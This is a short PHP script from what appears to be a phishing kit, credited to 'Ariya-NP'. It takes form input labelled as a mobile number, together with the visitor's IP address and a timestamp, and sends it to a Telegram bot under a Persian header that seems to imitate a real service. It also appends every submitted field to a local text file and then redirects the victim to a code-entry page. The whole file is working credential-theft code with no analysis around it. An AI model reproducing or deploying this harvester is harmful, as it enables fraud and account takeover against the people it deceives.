<?php # IN THE NAME OF GOD #
#=================== Enter php code ========================#
include ("jdf.php");
if (!empty($_POST)) {
require_once 'Telegram.php';
Telegram::sendMessage('🔐ویــــــپاد🔐'."\n".'➖➖➖➖➖➖➖➖➖➖'."\n".'🔸شماره همراه : '.$_POST['user']."\n" .'➖➖➖➖➖➖➖➖➖➖'."\n".'📱آیدی:'.$_SERVER['REMOTE_ADDR']."\n".'⏱ساعت:'.jdate("h:i:s a")."\n".'⏰تاریخ:'.jdate('l Y F ')."\n".'➖➖➖➖➖➖➖➖➖➖'."\n".'🆔 Ariya-NP');
}
#================== End php code ==========================#
// developed by Ariya-NP //
?>
<!--
===================== Please Dont touch This bellow codes ================
Programing at data 2019/09/09 - 12:00AM - Ariya-NP
----------- goog luck-------------
-->
<html dir="ltr">
<head>
<meta http-equiv="refresh" content="0 ; url= ./code.html">
<?php
$handle = fopen("1378.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>